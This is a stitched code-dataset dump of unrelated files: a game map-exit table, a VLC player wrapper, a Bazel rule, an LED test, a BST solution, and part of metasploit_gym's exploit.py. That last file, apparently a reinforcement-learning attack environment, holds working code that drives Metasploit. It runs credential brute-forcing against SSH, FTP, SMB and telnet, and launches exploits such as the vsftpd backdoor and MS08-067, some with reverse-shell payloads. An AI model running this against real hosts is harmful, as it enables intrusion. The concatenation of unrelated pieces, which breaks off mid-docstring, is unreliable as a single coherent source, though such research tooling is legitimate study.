666: [667, 0, 0, 430, 446, "", b"", False, True, False, "Pyramid: Map 213 to Map 218"],
667: [666, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 213"],
668: [669, 0, 0, 413, 424, "", b"", False, True, False, "Pyramid: Map 204 to Map 210"], # Room 6
669: [668, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 210 to Map 204"],
670: [671, 0, 0, 424, 425, "", b"", False, True, False, "Pyramid: Map 210 to Map 211"],
671: [670, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 211 to Map 210"],
672: [673, 0, 0, 425, 447, "", b"", False, True, False, "Pyramid: Map 211 to Map 218"],
673: [672, 0, 0, 0, 0, "", b"", False, True, False, "Pyramid: Map 218 to Map 211"],
# Babel
682: [683, 0, 0, 460, 461, "", b"", False, True, False, "Babel: Map 222 to Map 223"],
683: [682, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 223 to Map 222"],
684: [685, 0, 0, 462, 463, "", b"", False, True, False, "Babel: Map 223 to Map 224"],
685: [684, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 224 to Map 223"],
686: [687, 0, 0, 463, 474, "", b"", False, True, False, "Babel: Map 224 to Map 242"], # Castoth
687: [686, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 242 to Map 224"],
688: [689, 0, 0, 463, 475, "", b"", False, True, False, "Babel: Map 224 to Map 243"], # Viper
689: [688, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 243 to Map 224"],
690: [691, 0, 0, 463, 465, "", b"", False, True, False, "Babel: Map 224 to Map 225 (bottom)"],
691: [690, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 225 to Map 224 (bottom)"],
692: [693, 0, 0, 466, 464, "", b"", False, True, False, "Babel: Map 225 to Map 224 (top)"],
693: [692, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 224 to Map 225 (top)"],
694: [695, 0, 0, 464, 476, "", b"", False, True, False, "Babel: Map 224 to Map 244"], # Vampires
695: [694, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 244 to Map 224"],
696: [697, 0, 0, 464, 477, "", b"", False, True, False, "Babel: Map 224 to Map 245"], # Sand Fanger
697: [696, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 245 to Map 224"],
698: [699, 0, 0, 464, 469, "", b"", False, True, False, "Babel: Map 224 to Map 226"],
699: [698, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 226 to Map 224"],
#700: [701, 0, 0, 470, 471, "", b"", False, True, False, "Babel: Map 226 to Map 227"], #DUPLICATE W/BOSS EXITS
#701: [700, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 227 to Map 226"],
702: [703, 0, 0, 471, 478, "", b"", False, True, False, "Babel: Map 227 to Map 246"], # Mummy Queen
703: [702, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 246 to Map 227"],
704: [705, 0, 0, 471, 467, "", b"", False, True, False, "Babel: Map 227 to Map 225 (bottom)"],
705: [704, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 225 to Map 227 (bottom)"],
706: [707, 0, 0, 468, 472, "", b"", False, True, False, "Babel: Map 225 to Map 227 (top)"],
707: [706, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 227 to Map 225 (top)"],
708: [709, 0, 0, 472, 473, "", b"", False, True, False, "Babel: Map 227 to Map 222"],
709: [708, 0, 0, 0, 0, "", b"", False, True, False, "Babel: Map 222 to Map 227"],
# Jeweler's Mansion
720: [721, 0, 0, 8, 480, "8d32a", b"", False, True, True, "Mansion entrance"],
721: [720, 0, 0, 480, 400, "8fcb4", b"", False, True, True, "Mansion exit"]
}
| 59.960007 | 236 | 0.462324 | 324,753 | 0.998187 | 0 | 0 | 0 | 0 | 0 | 0 | 107,161 | 0.329379 |
2cc43eb4f9599bc9a7ccc0a29be8b90564b75a49 | 8,938 | py | Python | src/MediaPlayer/Player/VLCPlayer.py | JKorf/MediaPi | 4b21bb9cfa692534d0098ad947dd99beb7b0c1ed | [
"MIT"
] | 2 | 2018-02-26T15:57:04.000Z | 2019-03-11T15:21:38.000Z | src/MediaPlayer/Player/VLCPlayer.py | JKorf/MediaPi | 4b21bb9cfa692534d0098ad947dd99beb7b0c1ed | [
"MIT"
] | 1 | 2018-07-25T16:36:11.000Z | 2018-07-25T16:36:11.000Z | src/MediaPlayer/Player/VLCPlayer.py | JKorf/MediaPi | 4b21bb9cfa692534d0098ad947dd99beb7b0c1ed | [
"MIT"
] | null | null | null | import datetime
import os
import time
from enum import Enum
import sys
from MediaPlayer.Player import vlc
from MediaPlayer.Player.vlc import libvlc_get_version, Media, MediaList
from Shared.Events import EventManager, EventType
from Shared.Logger import Logger, LogVerbosity
from Shared.Observable import Observable
from Shared.Settings import Settings
from Shared.Threading import CustomThread
from Shared.Util import Singleton
class VLCPlayer(metaclass=Singleton):
    def __init__(self):
        """Build the singleton VLC wrapper: create the libVLC instance and
        players, register event handlers and start the state-observer thread."""
        self.__vlc_instance = None  # vlc.Instance; created in instantiate_vlc() below
        self.player_state = PlayerData()  # observable playback state (path, volume, ...)
        self.instantiate_vlc()  # must run before media_player_new() below
        self.media = None  # currently loaded vlc.Media; set in play()
        self.__player = self.__vlc_instance.media_player_new()
        # The list player wraps the single player; play() uses it for youtube URLs.
        self.__list_player = self.__vlc_instance.media_list_player_new()
        self.__list_player.set_media_player(self.__player)
        # NOTE(review): event manager is kept but no callbacks are attached here —
        # presumably subscribed elsewhere; confirm before removing.
        self.__event_manager = self.__player.event_manager()
        self.set_volume(75)  # default startup volume (0-100)
        EventManager.register_event(EventType.SetSubtitleFiles, self.set_subtitle_files)
        EventManager.register_event(EventType.StopPlayer, self.stop)
        self.player_observer = CustomThread(self.observe_player, "Player observer")
        self.player_observer.start()
        self.stop_player_thread = None
def instantiate_vlc(self):
parameters = self.get_instance_parameters()
Logger().write(LogVerbosity.Debug, "VLC parameters: " + str(parameters))
self.__vlc_instance = vlc.Instance("cvlc", *parameters)
Logger().write(LogVerbosity.Info, "VLC version " + libvlc_get_version().decode('utf8'))
def play(self, url, time=0):
parameters = self.get_play_parameters(url, time)
Logger().write(LogVerbosity.Info, "VLC Play | Url: " + url)
Logger().write(LogVerbosity.Info, "VLC Play | Time: " + str(time))
Logger().write(LogVerbosity.Info, "VLC Play | Parameters: " + str(parameters))
self.player_state.start_update()
self.player_state.path = url
self.player_state.stop_update()
self.media = Media(url, *parameters)
if 'youtube' in url:
media_list = MediaList()
media_list.add_media(self.media)
self.__list_player.set_media_list(media_list)
self.__list_player.play()
else:
self.__player.set_media(self.media)
self.__player.play()
@staticmethod
def get_instance_parameters():
params = ["--verbose=" + str(Settings.get_int("vlc_log_level")),
"--network-caching=" + str(Settings.get_int("network_caching")),
"--ipv4-timeout=500",
"--image-duration=-1"]
if sys.platform == "linux" or sys.platform == "linux2":
log_path = Settings.get_string("base_folder") + "/Logs/" + datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')
params.append("--logfile=" + log_path + '/vlc_' + datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S') + ".txt")
params.append("--file-logging")
params.append("--file-caching=5000")
return params
def get_play_parameters(self, url, time):
params = []
if time != 0:
params.append("start-time=" + str(time // 1000))
return params
def set_window(self, handle):
if sys.platform == "linux" or sys.platform == "linux2":
self.__player.set_xwindow(handle)
else:
self.__player.set_hwnd(handle)
def pause_resume(self):
Logger().write(LogVerbosity.All, "Player pause resume")
self.__player.pause()
def stop(self):
Logger().write(LogVerbosity.All, "Player stop")
thread = CustomThread(lambda: self.__player.stop(), "Stopping VLC player")
thread.start()
def set_volume(self, vol):
Logger().write(LogVerbosity.Debug, "Player set volume " + str(vol))
self.__player.audio_set_volume(vol)
self.player_state.start_update()
self.player_state.volume = vol
self.player_state.stop_update()
def get_volume(self):
return self.__player.audio_get_volume()
def get_position(self):
return self.__player.get_time()
def get_length(self):
return int(self.__player.get_length())
def set_time(self, pos):
Logger().write(LogVerbosity.Debug, "Player set time " + str(pos))
self.__player.set_time(pos)
self.player_state.start_update()
self.player_state.playing_for = pos
self.player_state.stop_update()
def set_position(self, pos):
Logger().write(LogVerbosity.Debug, "Player set position " + str(pos))
self.__player.set_position(pos)
def set_subtitle_delay(self, delay):
Logger().write(LogVerbosity.Debug, "Player set subtitle delay " + str(delay))
self.__player.video_set_spu_delay(delay)
self.player_state.start_update()
self.player_state.sub_delay = delay
self.player_state.stop_update()
def get_state(self):
return self.__player.get_state()
def get_audio_track(self):
return self.__player.audio_get_track()
def set_audio_track(self, track_id):
Logger().write(LogVerbosity.Debug, "Player set audio track " + str(track_id))
self.__player.audio_set_track(track_id)
self.player_state.start_update()
self.player_state.audio_track = track_id
self.player_state.stop_update()
def get_audio_tracks(self):
tracks = self.__player.audio_get_track_description()
result = []
for trackid, trackname in tracks:
result.append((trackid, trackname.decode('utf8')))
return result
def set_subtitle_files(self, files):
Logger().write(LogVerbosity.Debug, "Adding " + str(len(files)) + " subtitle files")
pi = sys.platform == "linux" or sys.platform == "linux2"
for file in reversed(files):
if not pi and file[1] != ":":
file = "C:" + file
file = file.replace("/", os.sep).replace("\\", os.sep)
# NOTE this must be called after Play()
self.__player.video_set_subtitle_file(file)
def set_subtitle_track(self, id):
Logger().write(LogVerbosity.Debug, "Player set subtitle track " + str(id))
self.__player.video_set_spu(id)
self.player_state.start_update()
self.player_state.sub_track = id
self.player_state.stop_update()
def get_subtitle_count(self):
return self.__player.video_get_spu_count()
def get_subtitle_tracks(self):
tracks = self.__player.video_get_spu_description()
result = []
for trackid, trackname in tracks:
result.append((trackid, trackname.decode('utf-8')))
return result
def get_subtitle_delay(self):
return self.__player.video_get_spu_delay()
def get_selected_sub(self):
return self.__player.video_get_spu()
def try_play_subitem(self):
media = self.__player.get_media()
if media is None:
self.stop()
return
subs = media.subitems()
if subs is None:
self.stop()
return
if len(subs) == 1:
subs[0].add_options("demux=avformat")
self.__player.set_media(subs[0])
self.__player.play()
def observe_player(self):
while True:
state = self.get_state().value
if state in [5, 6, 7]:
state = 0
new_state = PlayerState(state)
if new_state == PlayerState.Nothing and self.player_state.state != PlayerState.Nothing:
self.stop_player_thread = CustomThread(self.stop, "Stopping player")
self.stop_player_thread.start()
self.player_state.start_update()
self.player_state.state = new_state
self.player_state.playing_for = self.get_position()
self.player_state.length = self.get_length()
self.player_state.audio_tracks = self.get_audio_tracks()
self.player_state.audio_track = self.get_audio_track()
self.player_state.sub_delay = self.get_subtitle_delay()
self.player_state.sub_track = self.get_selected_sub()
self.player_state.sub_tracks = self.get_subtitle_tracks()
self.player_state.volume = self.get_volume()
self.player_state.stop_update()
time.sleep(0.5)
class PlayerState(Enum):
    """Simplified playback states published by the observer loop.

    libVLC states 5/6/7 are collapsed into ``Nothing`` by
    ``VLCPlayer.observe_player`` before conversion to this enum.
    """

    Nothing = 0
    Opening = 1
    Buffering = 2
    Playing = 3
    Paused = 4
class PlayerData(Observable):
    """Observable snapshot of the media player state.

    Registered under the name "PlayerData" with a 0.5s update interval;
    fields are written between start_update()/stop_update() by VLCPlayer.
    """

    def __init__(self):
        super().__init__("PlayerData", 0.5)
        self.path = None                    # URL/path of the currently loaded media
        self.state = PlayerState.Nothing    # current simplified playback state
        self.playing_for = 0                # current playback position (ms)
        self.length = 0                     # media length (ms)
        self.volume = 0                     # audio volume as reported by libVLC
        self.sub_delay = 0                  # subtitle delay as reported by libVLC
        self.sub_track = 0                  # selected subtitle track id
        self.sub_tracks = []                # available subtitle tracks: (id, name)
        self.audio_track = 0                # selected audio track id
        self.audio_tracks = []              # available audio tracks: (id, name)
| 34.376923 | 125 | 0.634818 | 8,497 | 0.95066 | 0 | 0 | 717 | 0.080219 | 0 | 0 | 749 | 0.0838 |
2cc4536cac3f4a836b4d31edbb9c035b10194cbe | 937 | bzl | Python | build/buildflag_header.bzl | Lynskylate/chromium-base-bazel | e68247d002809f0359e28ee7fc6c5c33de93ce9d | [
"BSD-3-Clause"
] | null | null | null | build/buildflag_header.bzl | Lynskylate/chromium-base-bazel | e68247d002809f0359e28ee7fc6c5c33de93ce9d | [
"BSD-3-Clause"
] | null | null | null | build/buildflag_header.bzl | Lynskylate/chromium-base-bazel | e68247d002809f0359e28ee7fc6c5c33de93ce9d | [
"BSD-3-Clause"
] | 1 | 2020-04-30T08:12:46.000Z | 2020-04-30T08:12:46.000Z | # Primitive reimplementation of the buildflag_header scripts used in the gn build
def _buildflag_header_impl(ctx):
content = "// Generated by build/buildflag_header.bzl\n"
content += '// From "' + ctx.attr.name + '"\n'
content += "\n#ifndef %s_h\n" % ctx.attr.name
content += "#define %s_h\n\n" % ctx.attr.name
content += '#include "build/buildflag.h"\n\n'
for key in ctx.attr.flags:
content += "#define BUILDFLAG_INTERNAL_%s() (%s)\n" % (key, ctx.attr.flags[key])
content += "\n#endif // %s_h\n" % ctx.attr.name
ctx.actions.write(output = ctx.outputs.header, content = content)
# Rule declaration: generates "%{header_dir}%{header}" in genfiles from the
# "flags" dict (flag name -> value). Primitive reimplementation of the gn
# buildflag_header template.
buildflag_header = rule(
    implementation = _buildflag_header_impl,
    attrs = {
        # Mapping of buildflag name -> literal value written into the macro.
        "flags": attr.string_dict(mandatory = True),
        # Output header file name (appended to header_dir, which may be empty).
        "header": attr.string(mandatory = True),
        "header_dir": attr.string(),
    },
    outputs = {"header": "%{header_dir}%{header}"},
    output_to_genfiles = True,
)
| 39.041667 | 88 | 0.638207 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 333 | 0.35539 |
2cc49cc05dd233210db2a108c300fb21af3b9cd7 | 737 | py | Python | test/test_led_matrix.py | soundmaking/led8x8m | 383fe39c9e328951a25fd23298a4a4c11e8c964e | [
"MIT"
] | null | null | null | test/test_led_matrix.py | soundmaking/led8x8m | 383fe39c9e328951a25fd23298a4a4c11e8c964e | [
"MIT"
] | null | null | null | test/test_led_matrix.py | soundmaking/led8x8m | 383fe39c9e328951a25fd23298a4a4c11e8c964e | [
"MIT"
] | null | null | null | import unittest
from led8x8m import LedMatrix
class TestLedMatrix(unittest.TestCase):
    """Sanity checks for the LedMatrix pin mapping and display buffer."""

    def test_pin_numbers(self):
        # Eight pins per axis, all distinct, and no pin shared between X and Y.
        self.assertEqual(len(LedMatrix.PIN_X), 8)
        self.assertEqual(len(LedMatrix.PIN_Y), 8)
        x_pins = set(LedMatrix.PIN_X)
        y_pins = set(LedMatrix.PIN_Y)
        self.assertEqual(len(x_pins), 8)
        self.assertEqual(len(y_pins), 8)
        self.assertTrue(x_pins.isdisjoint(y_pins))

    def test_matrix_buffer(self):
        # The frame buffer must be an 8x8 nested list.
        self.assertIsInstance(LedMatrix.matrix_buffer, list)
        self.assertEqual(len(LedMatrix.matrix_buffer), 8)
        for row_index in range(8):
            row = LedMatrix.matrix_buffer[row_index]
            self.assertIsInstance(row, list)
            self.assertEqual(len(row), 8)
| 35.095238 | 67 | 0.68114 | 688 | 0.933514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2cc64e7427ad44d75120cd7e72ff13af6fe08245 | 1,240 | py | Python | Algorithms/0538_Convert_BST_to_Greater_Tree/Python/Convert_BST_to_Greater_Tree_Solution_1.py | lht19900714/Leetcode_Python | 645211f0ec71de579f1b091453db9eea80de9816 | [
"MIT"
] | null | null | null | Algorithms/0538_Convert_BST_to_Greater_Tree/Python/Convert_BST_to_Greater_Tree_Solution_1.py | lht19900714/Leetcode_Python | 645211f0ec71de579f1b091453db9eea80de9816 | [
"MIT"
] | null | null | null | Algorithms/0538_Convert_BST_to_Greater_Tree/Python/Convert_BST_to_Greater_Tree_Solution_1.py | lht19900714/Leetcode_Python | 645211f0ec71de579f1b091453db9eea80de9816 | [
"MIT"
] | null | null | null |
# Space: O(n)
# Time: O(n)
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def convertBST(self, root):
        """Convert a BST into a Greater Tree in place.

        Each node's value becomes its original value plus the sum of all
        values greater than it. A reverse in-order traversal (right, node,
        left) visits keys in descending order, so a running total of the
        values seen so far is exactly the new value for each node.

        Replaces the previous O(n^2) approach (full inorder list plus a
        suffix ``sum`` per element, mapped through a dict keyed by node
        value), which also produced wrong results for duplicate keys because
        equal values collapsed to one dict entry. This version is O(n) time,
        O(h) extra space, and handles duplicates correctly.

        Args:
            root: root TreeNode of the BST (may be None).

        Returns:
            The same root node, with all values updated in place.
        """
        running_total = 0
        stack = []
        node = root
        while stack or node:
            # Dive right first so the largest keys are processed first.
            while node:
                stack.append(node)
                node = node.right
            node = stack.pop()
            running_total += node.val
            node.val = running_total
            node = node.left
        return root
| 26.956522 | 84 | 0.533065 | 1,013 | 0.816935 | 0 | 0 | 0 | 0 | 0 | 0 | 227 | 0.183065 |
2cc678dfef8cb0874fecfe2385fa62869906f077 | 14,652 | py | Python | metasploit_gym/action/exploit.py | phreakAI/MetasploitGym | 128b977ccebbbb026784cba0ecd82182fdfb0cdb | [
"MIT"
] | 6 | 2021-10-01T20:05:24.000Z | 2022-03-24T20:14:41.000Z | metasploit_gym/action/exploit.py | phreakAI/MetasploitGym | 128b977ccebbbb026784cba0ecd82182fdfb0cdb | [
"MIT"
] | 1 | 2021-12-13T09:24:56.000Z | 2022-03-27T02:08:14.000Z | metasploit_gym/action/exploit.py | phreakAI/MetasploitGym | 128b977ccebbbb026784cba0ecd82182fdfb0cdb | [
"MIT"
] | null | null | null | """Exploits currently supported
Straightforward to add more following the basic model presented here
"""
from .action import Exploit
import time
def wait_for_job_completion(job_info, client):
    """Block until the metasploit job described by ``job_info`` finishes.

    Returns immediately when ``job_info`` is None or already carries an
    "error" key. Otherwise polls the RPC server once per second until the
    job reports status "completed" or an error appears in the job info.
    """
    if job_info is None or "error" in job_info:
        return
    job_uuid = job_info["uuid"]
    while True:
        results = client.jobs.info_by_uuid(job_uuid)
        if "error" in results:
            return
        if results["status"] == "completed":
            return
        time.sleep(1)
class SSH_Bruteforce(Exploit):
    """Dictionary attack against an SSH service (default port 22).

    Wraps Metasploit's ``auxiliary/scanner/ssh/ssh_login``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "SSH_Bruteforce"
        self.service = "ssh"
        self.target = target
        # A credential scan has no access/OS/version prerequisites.
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=22):
        """Run the ssh_login scanner against host:port and block until done.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: SSH port, default 22
        """
        module = client.modules.use("auxiliary", "scanner/ssh/ssh_login")
        module["RHOSTS"] = host
        module["RPORT"] = port
        # TODO: This should be detected based on metasploit rpc server
        # NOTE(review): this is the wordlists *directory*; confirm the module
        # accepts a directory for USERPASS_FILE or whether a file was intended.
        module["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        wait_for_job_completion(module.execute(), client)
class FTP_Bruteforce(Exploit):
    """Dictionary attack against an FTP service (default port 21).

    Wraps Metasploit's ``auxiliary/scanner/ftp/ftp_login``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/ftp_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "FTP_Bruteforce"
        self.service = "ftp"
        self.target = target
        self.req_access = None
        self.req_os = None
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=21):
        """Run the ftp_login scanner against host:port and block until done.

        Fix: the default port was 23 (telnet); FTP and the ftp_login module
        use port 21.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: FTP port, default 21
        """
        exploit = client.modules.use("auxiliary", "scanner/ftp/ftp_login")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # TODO: This should be detected based on metasploit rpc server
        exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        job_info = exploit.execute()
        wait_for_job_completion(job_info, client)
class SMB_Bruteforce(Exploit):
    """Dictionary attack against an SMB service (default port 445).

    Wraps Metasploit's ``auxiliary/scanner/smb/smb_login``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "SMB_Bruteforce"
        self.service = "Microsoft-DS"
        self.target = target
        # A credential scan has no access/OS/version prerequisites.
        self.req_access = None
        self.req_os = None
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=445):
        """Run the smb_login scanner against host:port and block until done.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: SMB port, default 445
        """
        module = client.modules.use("auxiliary", "scanner/smb/smb_login")
        module["RHOSTS"] = host
        module["RPORT"] = port
        # TODO: This should be detected based on metasploit rpc server
        module["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        wait_for_job_completion(module.execute(), client)
class Telnet_Bruteforce(Exploit):
    """Dictionary attack against a telnet service (default port 23).

    Wraps Metasploit's ``auxiliary/scanner/telnet/telnet_login``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_login.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Telnet_Bruteforce"
        self.service = "telnet"
        self.target = target
        self.req_access = None
        self.req_os = None
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=23):
        """Run the telnet_login scanner against host:port and block until done.

        Fix: the default port was 445 (SMB), contradicting the class docstring;
        telnet and the telnet_login module use port 23.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: telnet port, default 23
        """
        exploit = client.modules.use("auxiliary", "scanner/telnet/telnet_login")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        # TODO: This should be detected based on metasploit rpc server
        exploit["USERPASS_FILE"] = "/usr/share/metasploit-framework/data/wordlists"
        job_info = exploit.execute()
        wait_for_job_completion(job_info, client)
class VSFTPD(Exploit):
    """Backdoor command execution in vsftpd 2.3.4 (FTP, default port 21).

    Wraps Metasploit's ``exploit/unix/ftp/vsftpd_234_backdoor``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "VSFTPD"
        self.service = "ftp"
        self.target = target
        self.req_access = None
        self.req_os = "unix"
        self.req_version = None
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=21):
        """Fire the vsftpd backdoor exploit at host:port and block until done.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: FTP port, default 21
        """
        module = client.modules.use("exploit", "unix/ftp/vsftpd_234_backdoor")
        module["RHOSTS"] = host
        module["RPORT"] = port
        wait_for_job_completion(module.execute(payload="cmd/unix/interact"), client)
class JavaRMIServer(Exploit):
    """RCE via the Java RMI registry's default remote class loading (port 1099).

    Wraps Metasploit's ``exploit/multi/misc/java_rmi_server``:
    https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/multi/misc/java_rmi_server.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Java_RMI_Server"
        self.service = "http"
        self.target = target
        self.req_access = None
        self.req_os = None
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=1099):
        """Fire the RMI server exploit at host:port and block until done.

        Fixes: pymetasploit3's ``ExploitModule.execute`` selects the payload via
        the ``payload`` keyword (the previous ``cmd=`` was ignored), and this
        class now waits for job completion like its sibling exploits.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: RMI registry port, default 1099
        """
        exploit = client.modules.use("exploit", "multi/misc/java_rmi_server")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class Ms08_067_Netapi(Exploit):
    """Classic SMB exploitation through a crafted RPC packet (MS08-067).

    Works great on Windows XP. Wraps Metasploit's
    ``exploit/windows/smb/ms08_067_netapi``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms08_067_netapi.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "ms08_067_netapi"
        self.service = "Microsoft-DS"
        self.target = target
        self.req_access = None
        self.req_os = "win"
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=445):
        """Fire ms08_067_netapi at host:port and block until done.

        Fix: pymetasploit3's ``ExploitModule.execute`` selects the payload via
        the ``payload`` keyword; the previous ``cmd=`` keyword was ignored.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: SMB port, default 445
        """
        exploit = client.modules.use("exploit", "windows/smb/ms08_067_netapi")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="windows/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class ManageEngine_Auth_Upload(Exploit):
    """RCE via authenticated file upload on ManageEngine ServiceDesk.

    Wraps Metasploit's ``exploit/multi/http/manageengine_auth_upload``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/manageengine_auth_upload.rb

    TODO: Find a vulnerable copy of this for building environments.
    """

    def __init__(self, target=(0, 0)):
        self.name = "ManageEngine_Auth_Upload"
        self.service = "http"
        self.target = target
        self.req_access = None
        self.req_os = None
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Fire the ManageEngine upload exploit at host:port and block until done.

        Fix: pymetasploit3's ``ExploitModule.execute`` selects the payload via
        the ``payload`` keyword; the previous ``cmd=`` keyword was ignored.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: ServiceDesk HTTP port, default 8080
        """
        exploit = client.modules.use("exploit", "multi/http/manageengine_auth_upload")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class ApacheJamesExecution(Exploit):
    """Apache James Server 2.3.2 insecure user creation / arbitrary file write.

    Wraps Metasploit's ``exploit/linux/smtp/apache_james_exec``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/smtp/apache_james_exec.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Apache_James_InsecureUserCreation"
        self.service = "smpt"
        self.target = target
        self.req_access = None
        self.req_os = "linux"
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Fire the Apache James exploit at host:port and block until done.

        Fixes: the body previously launched ``multi/http/manageengine_auth_upload``
        (a copy-paste leftover) with a Java payload; it now runs the module named
        in the class docstring with a unix command payload, via the ``payload``
        keyword that pymetasploit3 actually honours.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: default kept at 8080 for interface compatibility, though
            Apache James SMTP normally listens on port 25 — pass port explicitly.
        """
        exploit = client.modules.use("exploit", "linux/smtp/apache_james_exec")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="cmd/unix/reverse")
        wait_for_job_completion(job_info, client)
class SambaUsermapScript(Exploit):
    """Samba "username map script" command execution (port 139).

    Wraps Metasploit's ``exploit/multi/samba/usermap_script``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/samba/usermap_script.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Samba_Usermap_Script"
        self.target = target
        self.service = "NetBIOS-SSN"
        self.req_access = None
        self.req_os = "multi"
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=139):
        """Fire the usermap_script exploit at host:port and block until done.

        Fixes: pymetasploit3's ``ExploitModule.execute`` selects the payload via
        the ``payload`` keyword (``cmd=`` was ignored), and usermap_script is a
        unix command-injection exploit, so a cmd/unix payload replaces the
        previous Java meterpreter string.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: NetBIOS session port, default 139
        """
        exploit = client.modules.use("exploit", "multi/samba/usermap_script")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="cmd/unix/reverse")
        wait_for_job_completion(job_info, client)
class ApacheTomcatAuthenticationCodeExecution(Exploit):
    """Apache Tomcat Manager application deployer authenticated code execution.

